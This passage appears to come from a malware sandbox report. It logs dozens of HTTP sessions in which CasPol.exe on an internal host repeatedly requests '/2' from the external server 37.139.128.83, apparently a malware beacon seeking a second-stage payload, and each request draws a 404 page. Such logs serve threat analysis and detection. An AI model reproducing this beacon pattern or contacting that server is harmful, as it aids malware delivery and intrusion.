                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:09.426376104 CET | 328 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:09.426386118 CET | 328 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:09.426542997 CET | 328 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    27 | 192.168.11.20 | 49837 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:19.454461098 CET | 329 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:19.535763979 CET | 329 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:19 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:19.535883904 CET | 330 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:19.535974026 CET | 330 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:19.536063910 CET | 331 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:19.536145926 CET | 331 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    28 | 192.168.11.20 | 49839 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:29.561847925 CET | 332 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:29.604331970 CET | 339 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:29.604429007 CET | 339 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:29.604475975 CET | 339 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:29.604521036 CET | 340 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:29.604562044 CET | 340 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    29 | 192.168.11.20 | 49840 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:39.638174057 CET | 340 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:39.703213930 CET | 341 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:39 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:39.703282118 CET | 341 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:39.703327894 CET | 342 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:39.703371048 CET | 342 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:39.703416109 CET | 342 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.11.20 | 49800 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:17:17.180488110 CET | 188 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:17.208664894 CET | 188 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:17 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:17.208734035 CET | 189 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:17.208784103 CET | 189 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:17.208827019 CET | 189 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:17.208869934 CET | 190 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    30 | 192.168.11.20 | 49841 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:49.730093002 CET | 343 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:49.794543028 CET | 344 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:49 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:49.794631958 CET | 344 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:49.794694901 CET | 344 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:49.794749975 CET | 345 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:49.794809103 CET | 345 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    31 | 192.168.11.20 | 49847 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:59.821090937 CET | 400 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:59.854135990 CET | 400 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:59 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:59.854221106 CET | 401 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:59.854341984 CET | 401 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:59.854352951 CET | 402 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:59.854388952 CET | 402 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    32 | 192.168.11.20 | 49851 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:22:09.881185055 CET | 418 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:09.910502911 CET | 419 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:09 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:09.910592079 CET | 419 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:09.910655022 CET | 419 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:09.910712957 CET | 420 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:09.910772085 CET | 420 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    33 | 192.168.11.20 | 49852 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:22:19.941399097 CET | 421 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:19.964976072 CET | 421 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:19 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:19.965059042 CET | 422 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:19.965223074 CET | 422 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:19.965310097 CET | 423 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:19.965394974 CET | 423 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    34 | 192.168.11.20 | 49856 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:22:30.002024889 CET | 441 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:30.059920073 CET | 442 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:30.073276997 CET | 442 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:30.073358059 CET | 443 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:30.073452950 CET | 443 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:30.073503971 CET | 443 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    35 | 192.168.11.20 | 49858 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:22:40.109833956 CET | 462 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:40.143893003 CET | 463 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:40 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:40.143981934 CET | 463 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:40.144046068 CET | 464 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:40.144110918 CET | 464 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:40.144188881 CET | 464 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    36 | 192.168.11.20 | 49859 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:22:51.183643103 CET | 465 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:51.264005899 CET | 466 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:51 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:51.264113903 CET | 466 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:51.264184952 CET | 466 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:51.264250994 CET | 467 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:51.264365911 CET | 467 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    37 | 192.168.11.20 | 49862 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:01.292118073 CET | 492 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:01.376612902 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:01 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:01.376636028 CET | 493 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:01.376651049 CET | 494 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:01.376665115 CET | 494 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:01.376679897 CET | 494 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    38 | 192.168.11.20 | 49863 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:11.403112888 CET | 495 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:11.436139107 CET | 495 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:11 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:11.436197042 CET | 496 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:11.436214924 CET | 496 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:11.436230898 CET | 496 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:11.436245918 CET | 496 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    39 | 192.168.11.20 | 49864 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:21.459638119 CET | 497 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:21.510338068 CET | 498 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:21 GMT
